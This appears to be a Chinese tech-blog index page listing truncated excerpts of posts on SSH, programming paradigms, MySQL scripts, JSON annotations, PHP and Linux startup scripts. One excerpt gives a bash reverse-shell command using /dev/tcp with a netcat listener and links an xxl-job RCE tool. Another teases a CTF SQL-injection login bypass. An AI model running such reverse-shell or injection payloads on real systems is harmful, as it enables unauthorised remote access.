Linux系统SSH(SecureShellProtocol)服务Linux系统SSH(SecureShellProtocol)服务一:什么是SSH服务在数据传输前,SSH会对需要传输的数据进行加密,保证会话安全与会话中传输数据的安全,SSH客户端还包括一个远程拷贝命令scp二:SSH的结构SSH服务由服务端软件(openssh)和客户端(SSH、SecureCRT、Xshell)组成,SSH默认
分类:
系统相关 时间:
2020-12-02 12:42:55
阅读次数:
14
#2020编程语言TOP50 #编程语言的编程泛型 命令式: 面向过程:C语言、COBOL、Fortran 面向对象:C++、Java、PHP、python、go、Objective-C、C# 声明式:SQL 函数式:Haskell、F#、ML、Scala、lisp、logo、Scheme、R 逻辑 ...
分类:
编程语言 时间:
2020-12-02 12:38:11
阅读次数:
11
bash -i >& /dev/tcp/ip/port 0>&1 服务器监听 nc -lvvp 9999 利用工具 https://github.com/mrknow001/xxl-job-rce bash反弹shell命令 https://www.cnblogs.com/supdon/p/1346 ...
1 !/bin/bash 2 3 4 HOSTNAME="localhost" 5 PORT="3306" 6 USERNAME="root" 7 PASSWORD="1234" 8 DBNAME="mydatabase" 9 10 11 LOGIN_CMD="mysql -h${HOSTNAME} ...
分类:
数据库 时间:
2020-12-02 12:27:59
阅读次数:
12
json注解: 1、@jsonIgnoreProperties: 此注解是类注解,作用是json序列化时将java bean中的一些属性忽略掉,序列化和反序列化都受影响。 写法将此标签加在model 类的类名上 ,可以多个属性也可以单个属性 //生成json时将name和age属性过滤 @JsonI ...
分类:
Web程序 时间:
2020-12-02 12:02:00
阅读次数:
8
shell是弱类型语言如何查看linux支持哪些shell:cat/etc/shells
分类:
系统相关 时间:
2020-12-02 11:57:06
阅读次数:
7
/** * PHP不使用速算扣除数计算个人所得税 * @param $salary float 含税收入金额 * @param int $deduction float $deduction 保险等应当扣除的金额 默认值为0 * @param int $threshold float $thresh ...
分类:
Web程序 时间:
2020-12-01 12:44:55
阅读次数:
18
code macname@localhost Desktop % cat content fox jumps over the lazy dog. fox jumps over the lazy dog. fox jumps over the lazy dog. fox jumps over the ...
分类:
系统相关 时间:
2020-12-01 12:32:52
阅读次数:
24
php后台验证两种方式绕过 前言 环境:buuctf中[GXYCTF2019]BabySQli1 知识点:两种验证方式,密码绕过 参考:博客 做题 sql注入,fuzz过滤了(,),=,or 然后就琢磨着都过滤了(),函数都不能用,还怎么进行sql注入 尝试着成功登录进去 1'||1 like 1# ...
分类:
Web程序 时间:
2020-12-01 12:30:43
阅读次数:
8
1.打开shell终端,输入 sudo vi /etc/rc.local 2.在编辑器里面输入自己要启动的脚本 #!/bin/bash echo "run incar ai program..." cd /opt/robot nohup bash autorobot.sh & 2>/dev/null ...
分类:
系统相关 时间:
2020-12-01 12:15:17
阅读次数:
12